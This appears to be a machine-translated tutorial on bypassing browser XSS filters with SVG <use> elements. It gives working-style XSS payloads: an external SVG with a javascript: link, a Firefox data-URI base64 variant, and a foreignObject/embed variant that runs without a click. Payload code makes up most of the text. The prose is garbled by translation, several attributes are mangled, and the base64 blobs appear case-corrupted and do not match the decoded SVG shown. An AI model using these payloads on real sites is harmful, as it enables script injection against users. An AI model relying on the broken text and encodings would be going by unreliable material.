Bypassing browser XSS audits with SVG

The <use> elements in SVG are used to reuse other elements, mainly for joins <defs> and alike, and we use it to refer to element elements in external SVG files through their IDs, and in <use> tag xlink: The href attribute begins with the ' # ' well character, and the reference to the external element is the same as the basic structure as follows:

Test.html

<svg> <use xlink:href= ' external.svg#rectangle '/> </svg>

External.svg:

<svg id= "Rectangle" 

xmlns= "Http://www.w3.org/2000/svg" xmlns:xlink= "Http://www.w3.org/1999/xlink"
width= "height=" >
<a xlink:href= "Javascript:alert (location)" >
<rect x= "0" y= "0" Width= "height=" 

/>
</a>
</svg>

The Sxternal.svg file begins with the <svg> tag, its ID is set to rectangle (rectangle), and the <rect> tag is used to draw a rectangle. You can use the <a> wrapping <rect> label, which creates a hyperlink. Using JavaScript's URL protocol, clickable hyperlinks execute JavaScript after clicking.

While SVG is loaded via the <use> tag, JavaScript will be executed. One thing to note is that it only loads SVG files and must satisfy the homology policy

======================

Firefox ====================== since the loaded external SVG file must be homologous, this feature does not seem to be a useful XSS attack vector, but Firefox will help us upgrade this attack vector first, you can use the Data:url protocol , and it allows us to create a file from within our busy schedule. It requires the right mime-type, here for Image/svg+xml. After Mimie-type is our attack payload or keyword base64. In particular, because the data is Base64 encoded, this helps to avoid the problem of breaking through the HTML structure. Now we no longer have to rely on another file on the server:

Test.html:

<svg>
<use xlink:href= "data:image/svg+xml;base64,
PHN2ZYBPZD0ICMVJDGFUZ2XLIIB4BWXUCZ0IAHR0CDO
Vl3d3dy53my5vcmcvmjawmc9zdmciihhtbg5zonhsaw
5rpsjodhrwoi8vd3d3lnczlm9yzy8xotk5l3hsaw5ri
Iagicb3awr0ad0imtawiibozwlnahq9ijewmci+dqo8
ysb4bgluazpocmvmpsjqyxzhc2nyaxb0omfszxj0kgx
vY2F0aW9uKSI+ PHJLY3QGED0IMCIGET0IMCIGD2LKDG
g9ijewmcigagvpz2h0psixmdaiic8+pc9hpg0kpc9zd
mc+ #rectangle "/>
</svg>

Base64 load after decoding:

<svg id= "Rectangle"
xmlns= "Http://www.w3.org/2000/svg" xmlns:xlink= "Http://www.w3.org/1999/xlink"
width= "height=" >
<a xlink:href= "Javascript:alert (location)" >
<rect x= "0" y= "0" Width= "height=" 

/>
</a>
</svg>

The browser displays a black rectangle that pops up when clicked location but why bother the victim to click on it, they never do what they do: the <script> tags in external.svg will not be parsed, but SVG support < The foreignobject> element may load non-SVG elements by expounding the extended attributes required by this object, which means that it is now possible to have <iframe>, <embed> and all the other supported HTML elements, and we can get from a bunch of element to perform JavaScript, using the <embed>+javascripturl protocol to see the following SVG:

<svg id= "Rectangle"
xmlns= "Http://www.w3.org/2000/svg" xmlns:xlink= "Http://www.w3.org/1999/xlink"
width= "height=" >
    
<script>alert (1) </script>
    
<foreignobject width= "100" height= "requiredextensions=" "
http://www.w3.org/1999/xhtml" >
    
<embed xmlns= "http://www.w3.org/" 1999/xhtml "
src=" Javascript:alert (location) "/>
    
</foreignObject>
</svg>

It will load the embedded tag through <foreignObject>, use the Javascripturl protocol to execute JavaScript, and then we'll encode the payload using the Base64 and load it through the data: protocol test.html

<svg>
<use xlink:href= "data:image/svg+xml;base64,
PHN2ZYBPZD0ICMVJDGFUZ2XLIIB4BWXUCZ0IAHR0CD
OVL3D3DY53MY5VCMCVMJAWMC9ZDMCIIHHTBG5ZONHS
Aw5rpsjodhrwoi8vd3d3lnczlm9yzy8xotk5l3hsaw
5riiagicb3awr0ad0imtawiibozwlnahq9ijewmci+
phnjcmlwdd5hbgvydcgxktwvc2nyaxb0pg0kidxmb3
jlawdut2jqzwn0ihdpzhropsixmdaiighlawdodd0i
NTAIDQOGICAGICAGICAGICAGICAGICAGCMVXDWLYZW
rfehrlbnnpb25zpsjodhrwoi8vd3d3lnczlm9yzy8x
OTK5L3HODG1SIJ4NCGK8ZW1IZWQGEG1SBNM9IMH0DH
a6ly93d3cudzmub3jnlze5otkvegh0bwwiihnyyz0i
AMF2YXNJCMLWDDPHBGVYDCHSB2NHDGLVBIKIIC8+DQ
ogicagpc9mb3jlawdut2jqzwn0pg0kpc9zdmc+ #rectangle "/>
</svg>